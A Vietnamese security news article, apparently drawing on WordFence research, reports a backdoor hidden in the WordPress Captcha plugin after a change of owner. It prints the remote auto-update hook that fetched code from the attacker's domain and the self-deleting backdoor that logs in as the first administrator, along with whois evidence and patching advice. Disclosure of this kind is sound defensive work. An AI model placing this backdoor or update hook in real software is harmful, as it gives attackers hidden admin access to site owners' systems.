Bảo Mật

Backdoor ẩn được tìm thấy trong Plugin WordPress Captcha hơn 300.000 trang web bị ảnh hưởng

[​IMG]

Bộ Captcha Plugin này trước được nhóm phát triển nổi tiếng BestWebSoft sở hữu , sau đó vào ngày 05/09/2017 họ tuyên bố thay đổi chủ sở hữu và không đề cập đến người sở hữu mới . Có thể Plugin Captcha này được bán cho một người đó và từ đó mã nguồn của bộ Plugin này bị thay đổi cài cắm backdoor khiến hơn 300.000 trang web đã đang sử dụng Plugin này có nguy cơ bị tấn công.

[​IMG]
Hơn 300.000 trang web đang sử dụng Plugin này

Phân tích mã nguồn của Plugin các nhà bảo mật đã thấy Plugin này được cấu hình để tự động cài đặt các phiên bản “backdoor” liên tục cập nhật từ xa theo đường dẫn URL – https [: //] simplywordpress [dot] net / captcha / captcha_pro_update.php – từ kho ứng dụng WordPress chính thức mà không cần tới sự chấp thuận của quản trị web.

Mã:

Select All
1 function cptch_wp_plugin_auto_update() 2 { 3 require_once (‘cptch_wp_auto_update.php’); 4 global $cptch_plugin_info; 5 6 $wptuts_plugin_current_version = $cptch_plugin_info[‘Version’]; 7 $wptuts_plugin_remote_path = ‘https://simplywordpress.net/captcha/captcha_pro_update.php’; 8 $wptuts_plugin_slug = plugin_basename(__FILE__); 9 10 new cptch_wp_auto_update($wptuts_plugin_current_version, $wptuts_plugin_remote_path, $wptuts_plugin_slug); 11 }

Trên trang Blog WordFence cho biết ” Backdoor này tạo ra một phiên với ID người dùng mang số 1 (người dùng quản trị mặc định mà WordPress tạo ra khi bạn cài đặt lần đầu tiên), tự đặt cookie xác thực và sau đó xoá chính nó”
Đoạn Mã này kích hoạt quá trình cập nhật tự động tải tệp ZIP từ https: // simplywordpress [dot] net / captcha / captcha_pro_update.php, sau đó trích xuất và tự cài đặt chính nó qua bản sao của Plugin Captcha đang chạy trên trang web WordPress .Tệp ZIP có một vài thay đổi mã nhỏ từ những gì trong kho plugin, và nó cũng chứa một tệp tin gọi là plugin-update.php, File này chính là backdoor .

Mã:

Select All
1 < $wptuts_plugin_remote_path = ‘https://simplywordpress.net/captcha/captcha_pro_update.php’; 2 — 3 > $wptuts_plugin_remote_path = ‘https://simplywordpress.net/captcha/captcha_free_update.php’;

Quá trình cập nhật từ xa qua giống với mã trong kho Plugin hợp pháp của WordPress, giúp loại bỏ dấu viết của backdoor và khiến người quản trị hoặc những người đã cài đặt Plugin không thể nhận ra Hacker

Mã:

Select All
1 @unlink(__FILE__); 2 3 require(‘../../../wp-blog-header.php’); 4 require(‘../../../wp-includes/pluggable.php’); 5 $user_info = get_userdata(1); 6 // Automatic login // 7 $username = $user_info->user_login; 8 $user = get_user_by(‘login’, $username ); 9 // Redirect URL // 10 if ( !is_wp_error( $user ) ) 11 { 12 wp_clear_auth_cookie(); 13 wp_set_current_user ( $user->ID ); 14 wp_set_auth_cookie ( $user->ID ); 15 16 $redirect_to = user_admin_url(); 17 wp_safe_redirect( $redirect_to ); 18 19 exit(); 20 }

Ai là kẻ đứng sau mã độc Backdoor này ?

Việc bỏ ra một số tiền lớn để mua lại Plugin này hẳn phải là một kẻ có mục đích mờ ám , có thể là các nhóm tội phạm có tổ chức .
Trong khi truy tìm nhận dạng thực tế của người mua plugin Captcha, các chuyên gia nghiên cứu của WordFence đã phát hiện ra tên miền internet phục vụ các cho file backdoor được đăng ký cho một người tên là “Stacy Wellington” bằng địa chỉ email “[email protected]

Sử dụng kỹ thuật tra cứu whois ngược lại simplewordpress.net. các nhà nghiên cứu đã phát hiện ra một số lượng lớn các Plugin thuộc nhiều lĩnh vực khác đều được đăng ký cho cùng một người dùng, bao gồm

  • Covert me Popup
  • Death To Comments
  • Human Captcha
  • Smart Recaptcha
  • Social Exchange

Tất cả các plugin trên đều chứa mã nguồn backdoor giống như các nhà nghiên cứu của WordFence tìm thấy trong Captcha.

Mã:

Select All
$ whois unsecuredloans4u.co.uk 2 3 Domain name: 4 unsecuredloans4u.co.uk 5 Registrant: 6 Stacy Wellington 7 … 8 Name servers: 9 ns1.heyrank.co.uk 195.154.179.176 10 ns2.heyrank.co.uk 195.154.179.176


Lịch sử DNS của simplewordpress.net có bản ghi A trước đó là 195.154.179.176, đây là bản ghi A hiện tại cho unsecuredloans4u.co.uk. Sự thay đổi DNS này xảy ra khoảng một tháng trước (hai tháng sau khi Committer của Commcha thay đổi sang wpdevmgr2678, chủ sở hữu mới).
Hiện tại WordFence đã hợp tác với WordPress để vá phiên bản Captcha bị ảnh hưởng và chặn Hacker xuất bản cập nhật, vì vậy các quản trị viên trang web được khuyến khích thay thế plugin của họ bằng phiên bản Captcha chính thức mới nhất 4.4.5.

WordFence sẽ phát hành chi tiết kỹ thuật cách backdoor cài đặt và thực thi , cung cấp các chứng cứ sau 30 ngày để các quản trị viên có đủ thời gian để vá các trang web của họ.

Đinh Quang Vinh nguồn

Trả lời

Email của bạn sẽ không được hiển thị công khai. Các trường bắt buộc được đánh dấu *